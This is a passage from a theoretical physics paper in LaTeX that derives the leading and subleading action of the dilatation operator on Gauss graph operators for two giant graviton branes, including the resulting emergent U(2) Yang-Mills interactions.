\item[3.] Labeling the Young diagram $r_1$ by a pair of parameters $(\xi_0,\xi_1)$ makes it straight forward to consider the large $N$ limit and the displaced corners limit. We assume $\xi_0\sim N$ and $\xi_0>>\xi_1$ when we refer to the large $N$ limit, hence we are allowed to set $\xi_0+\xi_1+a=\xi_0$ where $a$ is any number of order 1. When we refer to the displaced corners limit, we assume $\xi_1\sim \sqrt{N}$, which allows us to set $\xi_1+a=\xi_1$ and drop terms of order higher than (or equal to) $\frac{1}{\xi_1}$. Our computation thus has two small numbers, $\frac{1}{\xi_0}$ and $\frac{1}{\xi_1}$. We can expand in these two numbers, dropping higher order terms which provides a dramatic simplification.
\end{itemize}
Thanks to this simplification, it is possible to perform an analytic calculation to derive the exact action of the dilatation operator. We will explain this calculation next.
\subsection{The Analytic Calculation}
Our goal is to obtain the action of the dilatation operator in the Gauss graph basis, using the displaced corners limit, which is expected to describe the worldvolumne dynamics of giant gravitons. Based on the discussion in above sections, our calculation can be summarized as
\begin{itemize}
\item[1] Calculate the action of the dilatation operator in the restricted Schur polynomial basis according to equation (\ref{action on restricted Schur's}). The bulk of the work for this step is to compute the trace $\text{Tr}_{R}(\cdots)$ by expressing operators traced in terms of the Young-Yamanouchi vectors, which give a basis for $R$. In this step, we end up obtaining some $16\times16$ matrices describing the action of $D_{31},D_{21},D_{32}$ in the restricted Schur polynomial basis.
\item[2] Perform the transformation shown in equation (\ref{transform to Gauss graph basis}) on the matrices obtained in the last step. This entails computing the group theoretic coefficients given in equation (\ref{group theoretical coefficients for long columns}). This gives three $16\times16$ matrices, describing the action of $D_{31},D_{21},D_{32}$ in the Gauss graph basis. These matrices have entries dependent on $\xi_0,\xi_1$.
\item[3] Finally, we can expand the answer, after performing a power series expansion in the two small parameters $1/\xi_0$ and $1/\xi_1$. In order to refer to the large $N$ limit, we first expand results in $1/\xi_0$ and retain terms of the leading order of it. In practice, terms of order $(1/\xi_0)^0$ are retained in $D_{31}$ and $D_{21}$, while those of order $1/\xi_0$ are retained in $D_{32}$. Then, we expand answers in $1/\xi_1$. Eventually, the leading contribution to $D_{31}$ and $D_{21}$ comes from terms of order $1/(\xi_0\xi_1)^0$, and the leading contribution to $D_{32}$ is given by terms of order $1/(\xi_0\xi_1^{\,0})$. Therefore, the subleading correction to $D_{32}$ is given by terms of order $1/(\xi_0\xi_1)$. The leading order must agree with the analytic results shown in equations (\ref{D31,D21 in Gauss graph basis}) and $(\ref{M32 in Gauss graph basis})$, which provides a highly non-trivial check of our analytic result. The subleading terms correspond to interactions. These are new results obtained for the first time in this paper and they allow us to study the non-linear interactions present in the emergent Yang-Mills theory.
\end{itemize}
It is worth describing some of the details needed for the calculation. Firstly, we will explain how to compute the trace $\text{Tr}_{R}(\cdots)$ in equation (\ref{action on restricted Schur's}). It is principally done by writing everything in terms of the Young-Yamanouchi vectors. As the action of $\Gamma^{R}(\sigma)$ in the Young-Yamanouchi basis is widely known and we know how to write down the projectors that were introduced above, we need only discuss the interwiners $I_{R'T'}$. This map is non-vanishing only when $R$ is related to $T$, either $(i)$ by removing one box from the second column of $T$ to the first column, $(ii)$ by removing one box from the first column of $T$ to the second column or (iii) if $R=T$. The $I_{R'T'}$ for case $(i)$ can be written as
\begin{equation}
I_{R'T'}=\ket{{\tiny \young({\,}{\,},{\,}{\,},{\,}{\,},{\,}{\,},{\,},{\,},{\,},{1})}}\bra{{\tiny \young({\,}{\,},{\,}{\,},{\,}{\,},{\,}{\,},{\,}{1},{\,},{\,})}}
\end{equation}
while $I_{T'R'}$ is manifestly obtained by swapping the bra and ket vectors
\begin{equation}
I_{T'R'}=\ket{{\tiny \young({\,}{\,},{\,}{\,},{\,}{\,},{\,}{\,},{\,}{1},{\,},{\,})}}\bra{{\tiny \young({\,}{\,},{\,}{\,},{\,}{\,},{\,}{\,},{\,},{\,},{\,},{1})}}
\end{equation}
The interwiners for cases $(ii)$ and $(iii)$ are written in a similar way.
Next, we will derive the group theoretical coefficients used to transform to the Gauss graph basis. The main task is to compute the branching coefficient, which is given by
\begin{equation}
B_{k\mu_A}^{r_A\rightarrow 1^{\vec{n}_A}}=\braket{r_A;k|r\rightarrow 1^{\vec{n}_A};\mu_A}
\end{equation}
where $\ket{r_A;k}$ denotes the $k$th basis vector of $r_A$ and $\ket{r\rightarrow 1^{\vec{n}_A};\mu_A}$ denote the basis vector of anti-trivial representation $1^{\vec{n}_A}$ as a 1-dimensional subspace of $r_A$. In our two giant graviton system, no multiplicity label is needed and all possible $r_A$, given by $a,b,c,d$ introduced above, are one-dimensional. Thus we can drop all subscripts on $B_{k\mu_A}^{r_A\rightarrow 1^{\vec{n}_A}}$ and write it as a number $B^{r_A\rightarrow 1^{\vec{n}_A}}$. It is evident that
\begin{equation}
B^{a\rightarrow 1^{(2,0)}}=B^{b\rightarrow 1^{(0,2)}}=1
\end{equation}
because the anti-trivial representation $1^{(2,0)}$ (or $1^{(0,2)}$) of $S_2$ in $a$ (or $b$) is just itself. In addition, we have
\begin{equation}
B^{d\rightarrow 1^{(1,1)}}=B^{e\rightarrow 1^{(1,1)}}=\pm 1
\end{equation}
because $\ket{d\rightarrow 1^{(1,1)}}=\pm\ket{d}$ (or $\ket{e\rightarrow 1^{(1,1)}}=\pm\ket{e}$) can furnish the anti-trivial representation $1^{(1,1)}$ of $S_{1}\times S_{1}$ in $d$ (or $e$). This arbitrariness will not cause any problem as the branching coefficient always appears twice in the group theoretical coefficient. The above four branching coefficients are all we need. Now, the relevant group theoretical coefficients are given by
\begin{equation}
\begin{aligned}
&C^{a}(1)=|S_2| \sqrt{\frac{d_{a}}{2!}}\text{sgn}(1)\Gamma^{a}(1)B^{a\rightarrow 1^{(2,0)}} B^{a\rightarrow 1^{(2,0)}}\\
&C^{b}(1)=|S_2| \sqrt{\frac{d_{b}}{2!}}\text{sgn}(1)\Gamma^{b}(1)B^{b\rightarrow 1^{(0,2)}} B^{b\rightarrow 1^{(0,2)}}\\
&C^{d}(1)=|S_1\times S_1| \sqrt{\frac{d_{d}}{2!}}\text{sgn}(1)\Gamma^{d}(1)B^{d\rightarrow 1^{(1,1)}} B^{d\rightarrow 1^{(1,1)}}\\
&C^{d}((12))=|S_1\times S_1| \sqrt{\frac{d_{d}}{2!}}\text{sgn}((12))\Gamma^{d}((12))B^{d\rightarrow 1^{(1,1)}} B^{d\rightarrow 1^{(1,1)}}\\
&C^{e}(1)=|S_1\times S_1| \sqrt{\frac{d_{e}}{2!}}\text{sgn}(1)\Gamma^{e}(1)B^{e\rightarrow 1^{(1,1)}} B^{e\rightarrow 1^{(1,1)}}\\
&C^{e}((12))=|S_1\times S_1| \sqrt{\frac{d_{e}}{2!}}\text{sgn}((12))\Gamma^{e}((12))B^{e\rightarrow 1^{(1,1)}} B^{e\rightarrow 1^{(1,1)}}\\
\end{aligned}
\end{equation}
where the elements of $S_2$ are denoted by $1$ (the identity) as well as $(12)$, and we use the fact that $\Gamma^{r^T}(\sigma)=\text{sgn}(\sigma)\Gamma^{r}(\sigma)$ for the symmetric group. The final results are
\begin{equation}
\begin{aligned}
&C^{a}(1)=\sqrt{2}; \quad C^{b}(1)=\sqrt{2}; \\
&C^{d}(1)=\frac{1}{\sqrt{2}}; \quad C^{d}((12))=-\frac{1}{\sqrt{2}}\\
&C^{e}(1)=\frac{1}{\sqrt{2}}; \quad C^{e}((12))=\frac{1}{\sqrt{2}}
\end{aligned}
\end{equation}
Notice that $C^{a}((12))$ and $C^{b}((12))$ are not needed. To understand why this is the case, recall that the LHS of the basis transformation shown in equation (\ref{basis transformation}), requires only Gauss graph operators with non-equivalent $\sigma_A$. With $r_A=a$, we have $H_{\vec{n}_A}=S_2$ so that all elements of $S_2$ are in the same equivalence class of the double coset $S_2\backslash S_2/ S_2$. Thus for $r_A=a$, we only need operators with $\sigma_A=1$. In fact, a simple calculation shows that $C^{a}(1)=C^{a}((12))$ as we expect. The same argument shows that $C^{b}((12))$ is not needed for the same reason. However, for $r_A=d$ or $e$, we have $H_{\vec{n}_A}=S_1\times S_1$. In this case, 1 and (12) are in different classes of the double coset $(S_1\times S_1)\backslash S_2 / (S_1\times S_1)$ so that they are not equivalent. Hence, we need both operators with $\sigma_A=1$ as well as $\sigma_A=(12)$.
Finally, as we will use Gauss graph operators to diagonalize the dilatation operator, we implicitly assume that $D_{31}$ and $D_{21}$ commute with $D_{32}$. And we find this is true by using the exact result we obtain to calculate the commutators---matrix elements in commutators $[D_{31},D_{32}]$ and $[D_{21},D_{32}]$ are of order higher or equal to $1/(\xi_0\xi_1^2)$ in the expansion introduced above. Thus, they vanish at the order we consider.
These details give everything that is needed to carry out the calculation We give the results in the next subsection.
\subsection{Results at Leading Order}
To express the result for the action of the dilatation operator in the Gauss graph basis, it is worth introducing a concise notation to specify the relevant Gauss graph operators. We use $\alpha,\beta,\gamma$ to specify $\vec{n}_A$ where
\begin{equation}
\alpha=(2,0); \quad \beta=(0,2); \quad \gamma=(1,1)
\end{equation}
For example, $O_{(\xi_0,\xi_1)\gamma\alpha}((12),1)$ specifies the Gauss graph operator with $\vec{n}_2=\gamma,\vec{n}_3=\alpha,\sigma_{2}=(12),\sigma_{3}=1$ and $r_1=(\xi_0,\xi_1)$. With the help of equation (\ref{basis transformation}), we see that this Gauss graph operator is given by
\begin{equation}
\begin{aligned}
O_{(\xi_0,\xi_1)\gamma\alpha}((12),1)&=C^{d}((12))C^{a}(1)O_{da}(\xi_0,\xi_1)+C^{e}((12))C^{a}(1)O_{ea}(\xi_0,\xi_1)\\
&=-O_{da}(\xi_0,\xi_1)+O_{ea}(\xi_0,\xi_1)
\end{aligned}
\end{equation}
It is evident that we have 16 Gauss graph operators. In the notation we have just introduced, they can be written as
\begin{equation}
\begin{array}{llll}
O_{(\xi_0,\xi_1)\alpha\alpha}(1,1); & O_{(\xi_0,\xi_1)\gamma\alpha}(1,1); & O_{(\xi_0,\xi_1)\gamma\alpha}((12),1); & O_{(\xi_0,\xi_1)\beta\alpha}(1,1);\\
O_{(\xi_0,\xi_1)\alpha\gamma}(1,1); & O_{(\xi_0,\xi_1)\alpha\gamma}(1,(12)); & O_{(\xi_0,\xi_1)\gamma\gamma}(1,1); & O_{(\xi_0,\xi_1)\gamma\gamma}(1,(12));\\
O_{(\xi_0,\xi_1)\gamma\gamma}((12),1); & O_{(\xi_0,\xi_1)\gamma\gamma}((12),(12)); & O_{(\xi_0,\xi_1)\beta\gamma}(1,1); & O_{(\xi_0,\xi_1)\beta\gamma}(1,(12));\\
O_{(\xi_0,\xi_1)\alpha\beta}(1,1); & O_{(\xi_0,\xi_1)\gamma\beta}(1,1); & O_{(\xi_0,\xi_1)\gamma\beta}((12),1); & O_{(\xi_0,\xi_1)\beta\beta}(1,1);\\
\end{array}
\end{equation}
Each of these operators is specified by a Gauss graph. We will soon spell this correspondence out in detail. In terms of this notation, the action of the dilatation operator in the Gauss graph basis calculated analytically is shown below. We have considered the large $N$ limit and the displaced corners limit, hence we show the leading order result. Only the non-vanishing matrix elements are shown. For example, our analytic result implies that $D_{31}O_{(\xi_0,\xi_1)\gamma\alpha}(1,1)=0$, so we will not write it down. Also, to simplify our expressions we use shorthand $C_0=N-\xi_0$ and $C_1=N-\xi_0-\xi_1$.
The result of the action of $D_{31}$ in the Gauss graph basis reads
\begin{equation}
\begin{aligned}
&D_{31} O_{(\xi_0,\xi_1)\alpha\gamma}(1,(12))=2\left[ -(C_0+C_1)O_{(\xi_0,\xi_1)\alpha\gamma}(1,(12)) \right.\\
&\left.+\sqrt{C_0C_1}O_{(\xi_0+1,\xi_1-2)\alpha\gamma}(1,(12))+\sqrt{C_0C_1}O_{(\xi_0-1,\xi_1+2)\alpha\gamma}(1,(12))\right]
\end{aligned}
\end{equation}
\begin{equation}
\begin{aligned}
&D_{31} O_{(\xi_0,\xi_1)\gamma\gamma}(1,(12))=2\left[ -(C_0+C_1)O_{(\xi_0,\xi_1)\gamma\gamma}(1,(12)) \right.\\
&\left.+\sqrt{C_0C_1}O_{(\xi_0+1,\xi_1-2)\gamma\gamma}(1,(12))+\sqrt{C_0C_1}O_{(\xi_0-1,\xi_1+2)\gamma\gamma}(1,(12))\right]
\end{aligned}
\end{equation}
\begin{equation}
\begin{aligned}
&D_{31} O_{(\xi_0,\xi_1)\gamma\gamma}((12),(12))=2\left[ -(C_0+C_1)O_{(\xi_0,\xi_1)\gamma\gamma}((12),(12)) \right.\\
&\left.+\sqrt{C_0C_1}O_{(\xi_0+1,\xi_1-2)\gamma\gamma}((12),(12))+\sqrt{C_0C_1}O_{(\xi_0-1,\xi_1+2)\gamma\gamma}((12),(12))\right]
\end{aligned}
\end{equation}
\begin{equation}
\begin{aligned}
&D_{31} O_{(\xi_0,\xi_1)\beta\gamma}(1,(12))=2\left[ -(C_0+C_1)O_{(\xi_0,\xi_1)\beta\gamma}(1,(12)) \right.\\
&\left.+\sqrt{C_0C_1}O_{(\xi_0+1,\xi_1-2)\beta\gamma}(1,(12))+\sqrt{C_0C_1}O_{(\xi_0-1,\xi_1+2)\beta\gamma}(1,(12))\right]
\end{aligned}
\end{equation}
The result of the action of $D_{21}$ in the Gauss graph basis reads
\begin{equation}
\begin{aligned}
&D_{21} O_{(\xi_0,\xi_1)\gamma\alpha}((12),1)=2\left[ -(C_0+C_1)O_{(\xi_0,\xi_1)\gamma\alpha}((12),1) \right.\\
&\left.+\sqrt{C_0C_1}O_{(\xi_0+1,\xi_1-2)\gamma\alpha}((12),1)+\sqrt{C_0C_1}O_{(\xi_0-1,\xi_1+2)\gamma\alpha}((12),1)\right]
\end{aligned}
\end{equation}
\begin{equation}
\begin{aligned}
&D_{21} O_{(\xi_0,\xi_1)\gamma\gamma}((12),1)=2\left[ -(C_0+C_1)O_{(\xi_0,\xi_1)\gamma\gamma}((12),1) \right.\\
&\left.+\sqrt{C_0C_1}O_{(\xi_0+1,\xi_1-2)\gamma\gamma}((12),1)+\sqrt{C_0C_1}O_{(\xi_0-1,\xi_1+2)\gamma\gamma}((12),1)\right]
\end{aligned}
\end{equation}
\begin{equation}
\begin{aligned}
&D_{21} O_{(\xi_0,\xi_1)\gamma\gamma}((12),(12))=2\left[ -(C_0+C_1)O_{(\xi_0,\xi_1)\gamma\gamma}((12),(12)) \right.\\
&\left.+\sqrt{C_0C_1}O_{(\xi_0+1,\xi_1-2)\gamma\gamma}((12),(12))+\sqrt{C_0C_1}O_{(\xi_0-1,\xi_1+2)\gamma\gamma}((12),(12))\right]
\end{aligned}
\end{equation}
\begin{equation}
\begin{aligned}
&D_{21} O_{(\xi_0,\xi_1)\gamma\beta}((12),1)=2\left[ -(C_0+C_1)O_{(\xi_0,\xi_1)\gamma\beta}((12),1) \right.\\
&\left.+\sqrt{C_0C_1}O_{(\xi_0+1,\xi_1-2)\gamma\beta}((12),1)+\sqrt{C_0C_1}O_{(\xi_0-1,\xi_1+2)\gamma\beta}((12),1)\right]
\end{aligned}
\end{equation}
The result of the action of $D_{32}$ in the Gauss graph basis reads
\begin{equation}\label{comparision eq1}
\begin{aligned}
D_{32}O_{(\xi_0,\xi_1)\gamma\alpha}((12),1)&=\frac{4C_1}{\xi_0}O_{(\xi_0,\xi_1)\gamma\alpha}((12),1)\\
&-\frac{2\sqrt{2}\sqrt{C_0C_1}}{\xi_0}O_{(\xi_0,\xi_1)\gamma\gamma}((12),1)\\
\end{aligned}
\end{equation}
\begin{equation}
\begin{aligned}
D_{32}O_{(\xi_0,\xi_1)\alpha\gamma}(1,(12))&=\frac{4C_1}{\xi_0}O_{(\xi_0,\xi_1)\alpha\gamma}(1,(12))\\
&-\frac{2\sqrt{2}\sqrt{C_0C_1}}{\xi_0}O_{(\xi_0,\xi_1)\gamma\gamma}(1,(12))\\
\end{aligned}
\end{equation}
\begin{equation}
\begin{aligned}
D_{32}O_{(\xi_0,\xi_1)\gamma\gamma}(1,(12))&=\frac{2(C_0+C_1)}{\xi_0}O_{(\xi_0,\xi_1)\gamma\gamma}(1,(12))\\
&-\frac{2\sqrt{2}\sqrt{C_0C_1}}{\xi_0}O_{(\xi_0,\xi_1)\alpha\gamma}(1,(12))\\
&-\frac{2\sqrt{2}\sqrt{C_0C_1}}{\xi_0}O_{(\xi_0,\xi_1)\beta\gamma}(1,(12))\\
\end{aligned}
\end{equation}
\begin{equation}
\begin{aligned}
D_{32}O_{(\xi_0,\xi_1)\gamma\gamma}((12),1)&=\frac{2(C_0+C_1)}{\xi_0}O_{(\xi_0,\xi_1)\gamma\gamma}((12),1)\\
&-\frac{2\sqrt{2}\sqrt{C_0C_1}}{\xi_0}O_{(\xi_0,\xi_1)\gamma\alpha}((12),1)\\
&-\frac{2\sqrt{2}\sqrt{C_0C_1}}{\xi_0}O_{(\xi_0,\xi_1)\gamma\beta}((12),1)\\
\end{aligned}
\end{equation}
\begin{equation}
\begin{aligned}
D_{32}O_{(\xi_0,\xi_1)\gamma\gamma}((12),(12))&=\frac{2(C_0+C_1)}{\xi_0}O_{(\xi_0,\xi_1)\gamma\gamma}((12),(12))\\
\end{aligned}
\end{equation}
\begin{equation}
\begin{aligned}
D_{32}O_{(\xi_0,\xi_1)\beta\gamma}(1,(12))&=\frac{4C_0}{\xi_0}O_{(\xi_0,\xi_1)\beta\gamma}(1,(12))\\
&-\frac{2\sqrt{2}\sqrt{C_0C_1}}{\xi_0}O_{(\xi_0,\xi_1)\gamma\gamma}(1,(12))\\
\end{aligned}
\end{equation}
\begin{equation}
\begin{aligned}
D_{32}O_{(\xi_0,\xi_1)\gamma\beta}((12),1)&=\frac{4C_0}{\xi_0}O_{(\xi_0,\xi_1)\gamma\beta}((12),1)\\
&-\frac{2\sqrt{2}\sqrt{C_0C_1}}{\xi_0}O_{(\xi_0,\xi_1)\gamma\gamma}((12),1)\\
\end{aligned}
\end{equation}
Each of the above operators is normalized. This result is in perfect agreement with the analytic formulas given in equations (\ref{D31,D21 in Gauss graph basis}) and $(\ref{M32 in Gauss graph basis})$, providing a highly non-trivial check of our computation. We are now ready to extract the subleading corrections to the above results.
\subsection{The Subleading Interaction}\label{sbldin}
Our main interest in this section, is the subleading contribution to the action of $D_{32}$, which describes interactions of the excitations of branes, given by the edges of the Gauss graphs. The leading order result is expected to have the form given in equation (\ref{M32 in Gauss graph basis}), which has been argued to arise from the interaction Hamiltonian $\text{Tr}\left([\bar{b}, \bar{a}][a, b]\right)$. Our analytical calculation has verified this expectation.
We will now relax the strict displaced corners limit and evaluate the first corrections which appear. Of course, by moving further and further from the displaced corners limit we will reach a point where our formulas break down and the Gauss graph operators are no longer well defined. However close to the displaced corners limit we expect our description remains sensible, basically because we have confirmed the duality between our dilatation operator and a system of giant graviton branes, owning a nice semi-classical description in terms of branes excited by open strings.
We now proceed to calculate the subleading correction to $D_{32}$. Our two giant graviton system again provides the simplest possible setting for this task. The subleading correction is given by expanding the matrix elements of $D_{32}$ in terms of $\frac{1}{\xi_1}$ around $\xi_1=\infty$ and retaining terms of order $\mathcal{O}(\frac{1}{\xi_1})$. We will assume that we are in the strict large $N$ limit, so that we set $C_1\rightarrow C_0$. This expansion yields
%
\begin{equation}
D_{32}=D_{32}^{(0)}+\frac{C_0}{\xi_0 \xi_1}D_{32}^{(1)}
\end{equation}
%
The action of $D_{32}^{(0)}$ is the leading action of the dilatation operator, given in the previous section.
The subleading correction we obtain is shown in what follows
\begin{equation}
\begin{aligned}
&D_{32}^{(1)}O_{(\xi_0,\xi_1)\alpha\alpha}(1,1)=0
\end{aligned}
\end{equation}
{\vskip 0.3cm}
\begin{equation}
\begin{aligned}
D_{32}^{(1)}O_{(\xi_0,\xi_1)\gamma\alpha}(1,1)&=-4O_{(\xi_0,\xi_1)\alpha\gamma}(1,(12))\\
& +2\sqrt{2}O_{(\xi_0,\xi_1)\gamma\gamma}(1,(12))\\
\end{aligned}
\end{equation}
{\vskip 0.3cm}
\begin{equation}\label{Ogammaalpha121}
\begin{aligned}
&D_{32}^{(1)}O_{(\xi_0,\xi_1)\gamma\alpha}((12),1)=-4O_{(\xi_0,\xi_1)\gamma\alpha}((12),1)\\
\end{aligned}
\end{equation}
{\vskip 0.3cm}
\begin{equation}
\begin{aligned}
D_{32}^{(1)}O_{(\xi_0,\xi_1)\beta\alpha}(1,1)&=-4O_{(\xi_0,\xi_1)\gamma\gamma}(1,(12))\\
&+4\sqrt{2}O_{(\xi_0,\xi_1)\beta\gamma}(1,(12))
\end{aligned}
\end{equation}
{\vskip 0.3cm}
\begin{equation}
\begin{aligned}
D_{32}^{(1)}O_{(\xi_0,\xi_1)\alpha\gamma}(1,1)&=4O_{(\xi_0,\xi_1)\alpha\gamma}(1,(12))\\
&-2\sqrt{2}O_{(\xi_0,\xi_1)\gamma\gamma}(1,(12))
\end{aligned}
\end{equation}
{\vskip 0.3cm}
\begin{equation}
\begin{aligned}
D_{32}^{(1)}O_{(\xi_0,\xi_1)\alpha\gamma}(1,(12))&=-4O_{(\xi_0,\xi_1)\gamma\alpha}(1,1) \\
&+4O_{(\xi_0,\xi_1)\alpha\gamma}(1,1)\\
&+4O_{(\xi_0,\xi_1)\alpha\gamma}(1,(12)) \\
&+2\sqrt{2}O_{(\xi_0,\xi_1)\gamma\gamma}(1,1)\\
&+2\sqrt{2}O_{(\xi_0,\xi_1)\gamma\gamma}((12),(12))\\
&-4\sqrt{2}O_{(\xi_0,\xi_1)\alpha\beta}(1,1)\\
\end{aligned}
\end{equation}
{\vskip 0.3cm}
\begin{equation}
\begin{aligned}
D_{32}^{(1)}O_{(\xi_0,\xi_1)\gamma\gamma}(1,1)&=2\sqrt{2}O_{(\xi_0,\xi_1)\alpha\gamma}(1,(12))\\
&-2\sqrt{2}O_{(\xi_0,\xi_1)\beta\gamma}(1,(12))\\
\end{aligned}
\end{equation}
{\vskip 0.3cm}
\begin{equation}
\begin{aligned}
D_{32}^{(1)}O_{(\xi_0,\xi_1)\gamma\gamma}(1,(12))&=2\sqrt{2}O_{(\xi_0,\xi_1)\gamma\alpha}(1,1)\\
&-2\sqrt{2}O_{(\xi_0,\xi_1)\alpha\gamma}(1,1)\\
&-4O_{(\xi_0,\xi_1)\beta\alpha}(1,1)\\
&+4O_{(\xi_0,\xi_1)\alpha\beta}(1,1)\\
&+2\sqrt{2}O_{(\xi_0,\xi_1)\beta\gamma}(1,1)\\
&-2\sqrt{2}O_{(\xi_0,\xi_1)\gamma\beta}(1,1)\\
\end{aligned}
\end{equation}
{\vskip 0.3cm}
\begin{equation}
\begin{aligned}
D_{32}^{(1)}O_{(\xi_0,\xi_1)\gamma\gamma}((12),1)&=0
\end{aligned}
\end{equation}
{\vskip 0.3cm}
\begin{equation}
\begin{aligned}
D_{32}^{(1)}O_{(\xi_0,\xi_1)\gamma\gamma}((12),(12))&=2\sqrt{2}O_{(\xi_0,\xi_1)\alpha\gamma}(1,(12))\\
&-2\sqrt{2}O_{(\xi_0,\xi_1)\beta\gamma}(1,(12))\\
\end{aligned}
\end{equation}
{\vskip 0.3cm}
\begin{equation}
\begin{aligned}
D_{32}^{(1)}O_{(\xi_0,\xi_1)\beta\gamma}(1,1)&=2\sqrt{2}O_{(\xi_0,\xi_1)\gamma\gamma}(1,(12))\\
&-4O_{(\xi_0,\xi_1)\beta\gamma}(1,(12))
\end{aligned}
\end{equation}
{\vskip 0.3cm}
\begin{equation}
\begin{aligned}
D_{32}^{(1)}O_{(\xi_0,\xi_1)\beta\gamma}(1,(12))&=4\sqrt{2}O_{(\xi_0,\xi_1)\beta\alpha}(1,1)\\
&-2\sqrt{2}O_{(\xi_0,\xi_1)\gamma\gamma}(1,1)\\
&-2\sqrt{2}O_{(\xi_0,\xi_1)\gamma\gamma}((12),(12))\\
&-4O_{(\xi_0,\xi_1)\beta\gamma}(1,1)\\
&-4O_{(\xi_0,\xi_1)\beta\gamma}(1,(12))\\
&+4O_{(\xi_0,\xi_1)\gamma\beta}(1,1)\\
\end{aligned}
\end{equation}
{\vskip 0.3cm}
\begin{equation}
\begin{aligned}
D_{32}^{(1)}O_{(\xi_0,\xi_1)\alpha\beta}(1,1)&=-4\sqrt{2}O_{(\xi_0,\xi_1)\alpha\gamma}(1,(12))\\
&+4O_{(\xi_0,\xi_1)\gamma\gamma}(1,(12))
\end{aligned}
\end{equation}
{\vskip 0.3cm}
\begin{equation}
\begin{aligned}
D_{32}^{(1)}O_{(\xi_0,\xi_1)\gamma\beta}(1,1)&=-2\sqrt{2}O_{(\xi_0,\xi_1)\gamma\gamma}(1,(12))\\
&+4O_{(\xi_0,\xi_1)\beta\gamma}(1,(12))\\
\end{aligned}
\end{equation}
{\vskip 0.3cm}
\begin{equation}
\begin{aligned}
D_{32}^{(1)}O_{(\xi_0,\xi_1)\gamma\beta}((12),1)&=4O_{(\xi_0,\xi_1)\gamma\beta}((12),1)\\
\end{aligned}
\end{equation}
{\vskip 0.3cm}
\begin{equation}
\begin{aligned}
D_{32}^{(1)}O_{(\xi_0,\xi_1)\beta\beta}(1,1)&=0\\
\end{aligned}
\end{equation}
{\vskip 0.3cm}
The fact that the matrix of this subleading correction is symmetric implies that all corrections to the anomalous dimensions are real, as they must be. To interpret this result, it is necessary to write it in terms of the oscillators of the emergent gauge theory. Remarkably, this can be done and one finds the following interaction term written in terms of oscillators reproduces the matrix elements of the subleading action of $D_{32}$
\begin{equation}
\begin{aligned}
D_{32}^{(1)}=2{\rm Tr}&\Big(\sigma_z \left(\bar{b}_2 b_2 \bar{b}_3 b_3 \bar{b}_3 b_3 + \bar{b}_3 \bar{b}_2 b_2 \bar{b}_3 b_3 b_3 + \bar{b}_3 \bar{b}_3 b_3 \bar{b}_2 b_2 b_3-\bar{b}_2 \bar{b}_3 b_2 \bar{b}_3 b_3 b_3 \right.\\
&\left. -\bar{b}_3 \bar{b}_2 b_3 \bar{b}_3 b_2 b_3 - \bar{b}_3 \bar{b}_3 b_3 \bar{b}_2 b_3 b_2 +\bar{b}_2 \bar{b}_2 \bar{b}_3 b_3 b_2 b_2 - \bar{b}_2 \bar{b}_2 b_2 b_2 \hat{n}_3 \right)\Big)\\
+2{\rm Tr}&\Big(\sigma_x\sigma_z\left(\hat{n}_2\bar{b}_3\bar{b}_3b_3b_3-\bar{b}_3\bar{b}_3b_3b_3\hat{n}_2 +\bar{b}_3\bar{b}_3b_3\hat{n}_2b_3 -\bar{b}_3\hat{n}_2\bar{b}_3b_3b_3 \right)\Big)\\
-4{\rm Tr}&\Big(\sigma_x\hat{n}_2\sigma_z\hat{n}_3\Big)
\end{aligned}\label{subint}
\end{equation}
where we have used the usual Pauli matrices
$$
\sigma_z=\left[\begin{matrix} 1 &0\\ 0 &-1\end{matrix}\right]\qquad
\sigma_x=\left[\begin{matrix} 0 &1\\ 1 &0\end{matrix}\right]
$$
By identifying $\bar{b},b$ with $\bar{b}_3,b_3$ and $\bar{a},a$ with $\bar{b}_2,b_2$ as we did in the previous section, the above formula gives the interactions of the emergent Yang-Mills theory.
The emergent Yang-Mills theory lives on the world volume of two giant graviton branes. As a result, the gauge group is U(2).
These branes have different radii implying that the open strings stretching between the branes are massive. The strings tretching from a giant graviton brane, back to the same brane remain massless. Thus, the emergent guage theory is on the Coulomb branch and the U(2) gauge symmetry is broken to U(1)$\times$U(1). Under this gauge group we find
%
\begin{equation}
b_2\to e^{i\theta_1}b_2\qquad b_3\to e^{i\theta_2}b_3 \qquad \hat{n}_2\to\hat{n}_2\qquad \hat{n}_3\to\hat{n}_3
\end{equation}
It is not hard to check that (\ref{subint}) is indeed invariant under these U(1)$\times$U(1) transformations.
At leading order, the mixing is between $\phi_1$ and $\phi_2$, as well as between $\phi_1$ and $\phi_3$. This mixing is diagonalized by the Gauss graph operators. The leading contribution to the mixing involving $\phi_2$ and $\phi_3$ weakly mixes operators labeled by distinct Gauss graphs: two operators can only mix if they differ, at most, by the placement of a single edge that has both end points attached to a single node. The interaction in (\ref{subint}) allows graphs to mix even if this involves rearranging open edges. In Figure 1 below we have shown four pairs of graphs that are mixed by (\ref{subint}), but are not mixed by the leading contribution to the mixing involving $\phi_2$ and $\phi_3$. The interaction allows both the movement of closed loop edges from one node to another as well as the rearrangement of closed loop edges with both ends at the same node, into open edges that have their endpoints at different nodes.
\begin{figure}[h]
\centering
\includegraphics[width=1.0\linewidth]{"Gauss_graphs.pdf"}
\caption{Each pair of graphs shown are mixed by (\ref{subint}). They are not mixed by the leading contribution to the mixing involving $\phi_2$ and $\phi_3$. The edges for $\phi_{2}$ are colored red while edges for $\phi_{3}$ are colored black.}
\label{fig:gauss-graphs}
\end{figure}
\subsection{Numerical Spectra}
In this subsection, we discuss the eigenvalues of $D_{32}$, which is the Hamiltonian describing the interactions of the excitations. Let $n_T$ denote the total number of boxes in $R$, while $N$ is rank of the gauge group as usual. There are bounds for $n_T$ as follows
\begin{equation}
N<n_T<2N
\end{equation}
The lower limit sets the smallest radius possible for the giant gravitons two giant graviton system. This corresponds to the case that each column has $N/2$ boxes, so that both still have a macroscopic size. The upper limit reflects the restriction that the number of rows must be less than $N$ and the Young diagrams we consider have only two columns.
These bounds also agree with the fact that we are considering operators with a $\sim N$ dimension so that the Young diagrams labeling them have $\sim N$ boxes.
It is easy to verify that $D_{32}$, $D_{31}$ and $D_{21}$ commutes, so that it is sensible to consider the spectrum from a given one of them. Before considering the spectra of $D_{32}$, consider the spectra of $D_{31}$ and $D_{21}$. Examples of spectra are given in Fig \ref{fig:leading-d31-d21-nt399004-n200000-v1}. This shows that the system is a harmonic oscillator with a high energy cut off, in perfect agreement with the results of \cite{2010Emergentthree}.
\begin{figure}[h]
\centering
\includegraphics[width=1.0\linewidth]{"leading_D31_D21_n_T=399004_N=200000_v1.pdf"}
